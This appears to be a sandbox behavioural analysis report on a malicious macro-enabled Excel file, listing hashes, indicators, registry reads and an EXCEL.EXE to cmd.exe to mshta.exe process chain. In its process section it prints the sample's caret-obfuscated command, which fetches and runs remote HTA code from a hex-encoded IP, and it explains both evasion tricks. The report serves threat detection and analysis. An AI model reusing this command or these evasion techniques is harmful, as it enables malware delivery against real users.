Analysis
max time kernel: 150s
max time network: 146s
platform: windows10_x64
resource: win10-en-20211208
submitted: 19-01-2022 10:49
Behavioral task: behavioral1
Sample: ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm
Resource: win10-en-20211208
General
Target: ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm
Size: 114KB
MD5: 74e51ea25acbbad7750f905be8ae1ab9
SHA1: 260164bae357ae9136d5693146425eb6f6b09e55
SHA256: ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea
SHA512: 90d3b710ac2d533ec4997089091dc5100aa266f71fc3d2b836206600f1a255f5e9667a4e773a5e2e4b765517e6a395bd94dbf1e00631d4db9d2c560641272c34
Malware Config
Extracted URL: http://0x5cff39c3/sec/sec.html
The host is a hex-encoded IPv4 literal rather than a hostname: 0x5cff39c3 decodes to 92.255.57.195. This form is accepted by the Windows URL stack and is used to evade naive URL and IP matching; pivot on both the raw string and the decoded address.
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here EXCEL.EXE, which opened the macro-enabled workbook, launched cmd.exe.
Processes:
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
  pid: 2096 (cmd.exe)
  pid_target: 3064 (EXCEL.EXE)
Blocklisted process makes network request (1 IoC)
Processes:
  flow: 43
  pid: 824
  process: mshta.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Note that the reads here are attributed to EXCEL.EXE itself, which also queries these keys during normal start-up, so on its own this is a weak signal; the process lineage below is the stronger evidence.
Processes (EXCEL.EXE):
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (EXCEL.EXE):
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid: 3064 (EXCEL.EXE)
Suspicious use of SetWindowsHookEx (20 IoCs)
Processes:
  pid: 3064 (EXCEL.EXE), 20 occurrences
Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  PID 3064 (EXCEL.EXE) wrote to memory of 2096 (cmd.exe), 2 entries
  PID 2096 (cmd.exe) wrote to memory of 824 (mshta.exe), 2 entries
A parent writing into a child it has just created is normal CreateProcess behaviour; the signal in these entries is the lineage EXCEL.EXE -> cmd.exe -> mshta.exe, not the memory write itself.
Processes
1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (pid 3064)
   command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ad0de4164ae26ef5515f4fb320ad1316776b2eec28e447c51187cf5c58c1b8ea.xlsm"
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SYSTEM32\cmd.exe (pid 2096, child of EXCEL.EXE)
      command line: cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      The carets are cmd.exe escape characters; the parser strips them before execution, so the line that actually runs is "mshta http://0x5cff39c3/sec/sec.html". The obfuscation only defeats detections that match on the raw command line.
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\mshta.exe (pid 824, child of cmd.exe)
         command line: mshta http://0x5cff39c3/sec/sec.html
         - Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads (memory dumps)
memory/3064-115-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp, filesize 64KB
memory/3064-116-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp, filesize 64KB
memory/3064-117-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp, filesize 64KB
memory/3064-118-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp, filesize 64KB
memory/3064-121-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp, filesize 64KB
memory/3064-128-0x00007FFE76C00000-0x00007FFE76C10000-memory.dmp, filesize 64KB
memory/3064-129-0x00007FFE76C00000-0x00007FFE76C10000-memory.dmp, filesize 64KB